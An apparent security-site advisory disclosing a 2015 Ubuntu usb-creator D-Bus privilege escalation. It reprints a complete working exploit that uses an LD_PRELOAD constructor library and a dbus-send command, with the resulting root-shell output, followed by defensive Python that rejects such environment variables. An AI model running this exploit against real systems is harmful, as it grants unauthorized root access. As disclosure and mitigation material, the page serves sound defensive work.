Ubuntu local privilege escalation vulnerability disclosed, affecting versions 12.04 – 14.10 - vulnerability warning - myhack58

2015-04-25T00:00:00
ID MYHACK58:62201561634
Type myhack58
Reporter Anonymous
Modified 2015-04-25T00:00:00

Description

Today a local privilege escalation vulnerability affecting Ubuntu 12.04 – 14.10 was disclosed. It was posted by Google expert Tavis Ormandy, together with an exploit test program.

Vulnerability class: High risk

Scope of impact: Ubuntu Precise (12.04 LTS), Ubuntu Trusty (14.04 LTS) and Ubuntu Utopic (14.10)

Vulnerability test EXP:

    $ cat > test.c
    void __attribute__((constructor)) init (void)
    {
        chown("/tmp/test", 0, 0);
        chmod("/tmp/test", 04755);
    }
    ^D
    $ gcc -shared -fPIC -o /tmp/test.so test.c
    $ cp /bin/sh /tmp/test
    $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
    method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
    $ ls -l /tmp/test
    -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
    $ /tmp/test
    # id
    euid=0(root) groups=0(root)

More information: http://www.openwall.com/lists/oss-security/2015/04/22/12

Vulnerability report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396
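The dbus-send call above succeeds because a caller-supplied dictionary containing LD_PRELOAD ends up in the environment of a process run as root. The following is an added example, not code from the original page or from usb-creator, of a privileged service refusing such a dictionary before spawning anything. The function name `build_child_env`, the allowlist and the value patterns are assumptions made for illustration.

```python
import os.path
import re

# Assumption for this example: the only variables the helper needs from callers.
ALLOWED_KEYS = {"DISPLAY", "XAUTHORITY"}
# Constructed pattern: "[host]:display[.screen]", e.g. ":0" or "localhost:10.0".
DISPLAY_RE = re.compile(r"^[A-Za-z0-9.\-]*:\d+(\.\d+)?$")
# Fixed baseline for the child; nothing here is taken from the caller.
BASE_ENV = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin", "LANG": "C"}


class RejectedEnvironment(ValueError):
    """The caller-supplied environment must not reach a privileged child."""


def build_child_env(caller_env):
    """Build the environment for a process spawned by a root service.

    caller_env is the untrusted string:string dict received over the bus.
    Unknown keys (LD_PRELOAD, LD_LIBRARY_PATH, PYTHONPATH, ...) cause a
    refusal instead of being silently dropped, so the attempt can be logged.
    """
    unknown = sorted(set(caller_env) - ALLOWED_KEYS)
    if unknown:
        raise RejectedEnvironment("keys not allowed: " + ", ".join(unknown))
    env = dict(BASE_ENV)
    for key, value in caller_env.items():
        if "\x00" in value or "\n" in value:
            raise RejectedEnvironment("control character in " + key)
        if key == "DISPLAY" and not DISPLAY_RE.match(value):
            raise RejectedEnvironment("malformed DISPLAY: %r" % value)
        if key == "XAUTHORITY" and not (
            value.startswith("/") and os.path.normpath(value) == value
        ):
            raise RejectedEnvironment("XAUTHORITY must be a plain absolute path")
        env[key] = value
    return env


if __name__ == "__main__":
    # The dictionary from the dbus-send call on this page.
    page_dict = {"DISPLAY": "foo", "XAUTHORITY": "foo", "LD_PRELOAD": "/tmp/test.so"}
    try:
        build_child_env(page_dict)
    except RejectedEnvironment as exc:
        print("refused:", exc)
    # Constructed well-formed input.
    print(build_child_env({"DISPLAY": ":0", "XAUTHORITY": "/home/user/.Xauthority"}))
```

Pass the returned dict as `env=` when spawning the child instead of merging caller values into the service's own environment, and authorize the caller (for example with polkit) before the method does any work.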